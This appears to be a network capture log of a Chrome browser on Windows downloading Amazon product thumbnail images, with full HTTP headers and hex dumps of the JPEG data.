                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2473
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 0c1bafc3-d745-4606-b3a9-5e86c83686e6
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Feb 2024 13:19:10 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Thu, 03 Mar 2044 20:00:27 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 3448944
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:42 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000089-IAD, cache-ewr18150-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 02 01 02 02 02 02 03 04 03 03 03 03 03 06 04 03 04 04 05 03 04 04 05 04 05 05 04 05 05 05 05 06 05 04 04 05 06 05 05 05 08 05 06 06 07 06 05 07 05 08 05 08 08 08 08 09 09 08 05 09 0c 01 02 02 01 02 02 02 03 02 02 04 07 05 03 06 08 06 03 05 09 08 09 06 08 08 08 08 06 0a 08 09 07 08 05 08 08 06 07 07 06 06 06 05 06 08 06 08 08 08 03 06 08 07 05 0b 06 06 05 08 07 09 07 05 08 0a ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 37 00 01 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 08 04 05 06 07 09 03 0a 01 02 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 06 07 01 03 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fa 90 17 98 b0 00 00 00 f3 d2 d5
                                                                                                                                                                                                                                                                Data Ascii: JFIFt"7
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1095INData Raw: 33 6a 26 3f e9 84 dc 5b bf 87 a4 b1 2f c9 d9 85 38 91 70 a2 8b f3 43 9e 6c 41 37 1f f8 f9 ac 7e 5a c6 ef 25 5c dd 06 d8 b2 d4 dc a3 59 31 0c ba 4e 47 b8 b8 fb ad 4b f2 95 5b 87 33 f8 78 5b 53 71 ee 58 f5 07 97 e2 69 2f 26 9b 5f f1 44 ae 7f 91 be fa ad 86 b1 cd f4 90 4b 1a 41 55 02 a6 98 8e ee f3 d9 db 39 70 e3 97 6c 8e 6e 88 56 fd d8 a9 fe d8 74 4e 03 96 5a 36 92 1c c5 41 27 20 5b 8e 5f 3e 78 e6 d9 0b f1 2e da e9 b6 6c d4 4b 60 03 11 ee 15 40 39 2f ea 1c cb 93 c4 7c e4 9d d4 c8 6f 31 7b ee a5 4e 89 9a 25 bd e9 a2 96 c9 2d f5 51 72 77 95 44 bf dc ed 8b 98 9a 30 56 91 58 5e 58 b4 e8 ac d8 91 b7 30 a2 55 4e 75 c1 28 b8 61 61 bc db 99 2a 7c 62 62 e4 8d 9c 8c 85 6c 3b 59 44 cc 53 d1 65 9e 97 df 9f 10 ae 4b cd 21 2e 93 2d 4a 53 9d a4 8e 7d aa d8 75 87 9b 30 96
                                                                                                                                                                                                                                                                Data Ascii: 3j&?[/8pClA7~Z%\Y1NGK[3x[SqXi/&_DKAU9plnVtNZ6A' [_>x.lK`@9/|o1{N%-QrwD0VX^X0UNu(aa*|bbl;YDSeK!.-JS}u0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                134192.168.2.45000518.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC611OUTGET /images/I/31aozKg0dqL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC805INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 4298
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: ab274115-9281-49af-b25f-61d4744f5e45
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 02:17:03 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 13 Jun 2024 03:06:37 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-734,/images/I/31aozKg0dqL
                                                                                                                                                                                                                                                                Expires: Sun, 07 Aug 2044 02:17:03 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-734 /images/I/31aozKg0dqL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 cf275c3404dbe6c17a831886bac6a64c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: MWy3SxXw4bE5KRyxf67XBt8LsHeAM-SsgnJA8vbM6MKZBVw9QmUnWQ==
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC4298INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 31 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 06 07 03 05 01 04 08 02 09 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f6 58 00 00 00 00 00 47 49 12 0f f5 64 db 8a ef 12
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"1XGId


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                135192.168.2.45000418.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC611OUTGET /images/I/51Q42KWVMgL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC807INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 10209
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: b7fbf4fb-520d-4788-83f3-4aa8a9260163
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:42 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 07 May 2024 11:23:55 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-121,/images/I/51Q42KWVMgL
                                                                                                                                                                                                                                                                Expires: Sun, 07 Aug 2044 13:23:42 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-121 /images/I/51Q42KWVMgL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 ef04b5bd9d63162000acde84eaab4f9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: -3pHT_ttIweQaUhinOgRb-XhFvNv98mj5rW0R5on4umN-vUi3x_F6w==
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC10209INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 03 01 00 03 01 01 00 00 00 00 00 00 00 00 00 05 06 07 04 02 03 08 01 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 01 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 2c 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"5,


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                136192.168.2.45000618.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC611OUTGET /images/I/31zt7qzs+xL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 4609
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: 10ff17d8-55c5-4a59-bea4-4bedc08ea1c8
                                                                                                                                                                                                                                                                Date: Sun, 09 Jun 2024 22:39:07 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Fri, 26 May 2023 06:17:13 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-136,/images/I/31zt7qzs+xL
                                                                                                                                                                                                                                                                Expires: Sat, 04 Jun 2044 22:39:07 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-136 /images/I/31zt7qzs+xL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 9adf50a068a92adaab58cf6a21118640.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 138188
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: RhPS8yNY-I83zYvroEh0OMnxfXhFPQqHZzA5UFjLmFiM4yrMLEo0ZA==
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC4609INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 04 01 02 03 06 07 05 08 09 01 01 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 02 03 04 01 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 2c 00 00 00 00 01 ad 72 8d b7 66 ae ee 03
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"3,rf


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                137192.168.2.450016151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC378OUTGET /images/I/41WmXJZiubL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 9579
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 582b6880-8e3c-4c24-865d-2a45f9bf7b10
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 May 2022 10:54:45 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Fri, 06 May 2044 01:18:37 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.it
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 877376
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:42 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000175-IAD, cache-nyc-kteb1890088-NYC
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 06 07 08 03 02 01 09 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d9 60 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"3`
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: 93 46 ec ac 7e 85 ef cd 7b 4d e3 75 07 fc 8a 74 67 96 31 58 3f 8c fe 83 c5 a2 62 ca 2f 8d 4d 50 47 93 e5 4b 28 de 48 71 77 0e 48 71 57 f5 f3 ee 62 68 71 77 43 8b 8f b1 c4 e1 f6 d5 d0 ba 12 62 ec b1 df 03 2b a6 7b 2c ca 0c 99 9b 89 24 d4 f9 49 82 eb 88 29 a4 65 1b f2 67 5e d3 17 43 a8 7c f0 29 ed c3 1b e0 fa 0f 7e 29 2f 0a 14 72 f4 49 6a 66 bc 52 32 88 78 8e c2 f5 74 e3 1f 67 8d 98 18 b7 66 5c 67 4d 52 4b e6 12 0a b2 72 6c 90 63 b1 30 37 1f 13 c4 e2 aa 06 00 7c ac bb f3 65 66 59 45 35 95 d5 d5 3f 8d 97 b5 f8 d4 5e 68 55 55 3b bc 60 cb 06 3f 2b 6f c7 7c 40 be d9 15 1e 82 54 da c5 57 a2 f1 32 31 b2 75 14 25 35 f2 c7 44 c7 ab fa 74 6a 3a 10 8c 84 9a 3a 68 c2 ea 4c 36 29 1e e9 b0 b8 59 35 18 32 f8 c2 b8 02 88 ac f6 59 d6 64 c6 a1 36 61 6b e6 65 c4 17 0b 28 bc
                                                                                                                                                                                                                                                                Data Ascii: F~{Mutg1X?b/MPGK(HqwHqWbhqwCb+{,$I)eg^C|)~)/rIjfR2xtgf\gMRKrlc07|efYE5?^hUU;`?+o|@TW21u%5Dtj::hL6)Y52Yd6ake(
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 01 02 11 13 31 32 10 20 12 30 41 21 40 50 ff da 00 08 01 02 01 01 08 00 fe 2a 8b 65 92 d1 6d 1e 08 f1 43 87 e6 8b 8a 16 cb 6c f0 65 1f 10 c1 42 bd 24 e9 24 4b 2c 59 43 db ac a2 d8 94 90 9b fb d2 79 25 91 0f 61 57 ad 57 69 6c b8 8e 49 6c b9 fa bd 2f 65 c4 72 89 6c bd 2b 99 6c b8 8e 51 2d 97 a5 63 99 65 0d 09 d1 8f 28 4e be 85 cb d9 12 cb 12 ab 1e c8 a7 1f 57 a5 ec 89 64 4e 83 75 75 2e 17 11 e4 bb 5c 2e 17 18 e6 57 b2 74 2e b2 e3 2e 32 a5 3f 53 ff c4 00 26 11 00 01 03 02 05 05 01 01 01 00 00 00 00 00 00 00 01 00 02 11 03 10 12 14 20 32 33 04 13 21 31 41 22 40 50 ff da 00 08 01 03 01 01 08 00 ff 00 15 d5 03 44 9c da cd b9 66 1e bb 8f fa 2a b8 26 d6 96 e2 33 60 41 47 a9 6a cc b5 77 d8 b1 b6 d5 77 58 32 44 a9 bd 36 87 53 20 b3 60 4e
                                                                                                                                                                                                                                                                Data Ascii: 12 0A!@P*emCleB$$K,YCy%aWWilIl/erl+lQ-ce(NWdNuu.\.Wt..2?S& 23!1A"@PDf*&3`AGjwwX2D6S `N
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: 30 1a b0 9a 3d d3 54 6d 81 01 e2 3b a3 04 e8 3d 86 a9 20 37 87 55 c4 6c d9 6a 6c 4f 94 7a 2f 0d ad b1 cd ba b0 aa de 60 a1 0d a6 dd db 93 99 f7 8f b2 2d 69 13 77 51 52 1f f5 e1 e6 8b 78 3a b9 49 0c f2 db 73 22 61 be a5 60 23 fd b7 45 0b 28 b7 34 c1 3b b3 f4 79 32 2e 89 b4 98 df fb 9a 31 77 6f b5 0b 73 4f b5 48 d4 fc fe aa 19 d0 6e 73 49 cd ee d5 9e 26 0a 39 d0 f1 01 55 b9 d1 dc 3a ab 80 d0 65 73 1d 93 d1 13 5d a6 31 3c ed 45 18 3d bc 8a 60 74 2f 0f 86 70 16 07 d5 5c 14 23 1a cc c9 fd d4 8d 04 b5 b9 d9 5c f3 18 18 83 d9 ce 77 fa d7 c5 44 f7 e3 37 64 c4 21 1e 35 26 e1 4c 28 6d a3 f8 4e 2d 19 82 ca a2 ef 1c 66 63 72 a9 df 47 93 cf ba b3 1b 44 d1 29 e9 dd 10 63 99 18 86 ba 23 36 fa 8a 78 86 ab 45 d2 05 0a 85 c9 a0 ef 1f 18 96 ba 60 c2 3b ee 2a 31 75 a4 98 93
                                                                                                                                                                                                                                                                Data Ascii: 0=Tm;= 7UljlOz/`-iwQRx:Is"a`#E(4;y2.1wosOHnsI&9U:es]1<E=`t/p\#\wD7d!5&L(mN-fcrGD)c#6xE`;*1u
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: 79 78 1d c7 9c 2e 9f cc 2f 63 14 b4 f6 7c 54 7a 34 80 d7 d3 51 c1 cf 59 9c 29 e7 cf 1b 87 b0 d2 7b 1b 4c b9 7e 7f 3c ed de 23 db a7 81 14 01 9a 06 77 94 5f c3 00 be c3 7b 98 3c 61 2f 7a a2 7a 32 f2 df 5d dc 4b 45 41 5b 71 1d b7 f2 13 d7 64 95 aa b4 50 54 df 29 61 1c de 60 80 46 f8 4b 43 93 bd 63 86 50 f3 19 32 95 8e bd 3e 74 87 26 34 c2 ed 68 f2 69 34 1f d2 8f e9 47 f4 a2 a3 8e a3 02 26 83 fa 27 be 83 85 c2 79 60 c7 a5 ac 3f 43 11 2f cb d2 c8 11 c4 a1 ca 13 63 61 48 5e 7c a0 f5 32 c2 5b 4d 31 96 97 cc de 49 82 ea 4a 9c e4 ed 48 a7 ac d2 5b ed 84 c0 43 c0 fe 03 cf c2 9f 3f 8e 00 c3 02 fc 44 38 07 58 70 eb 60 47 78 7e a6 22 20 89 4a ce 8d ca bf 11 52 e2 ef 7e 50 e9 d3 cc a3 79 e3 0e 96 8f 30 4d 67 75 2d e1 09 30 b5 16 5b c1 c3 39 84 e5 a0 80 70 76 cc 7d 42
                                                                                                                                                                                                                                                                Data Ascii: yx./c|Tz4QY){L~<#w_{<a/zz2]KEA[qdPT)a`FKCcP2>t&4hi4G&'y`?C/caH^|2[M1IJH[C?D8Xp`Gx~" JR~Py0Mgu-0[9pv}B
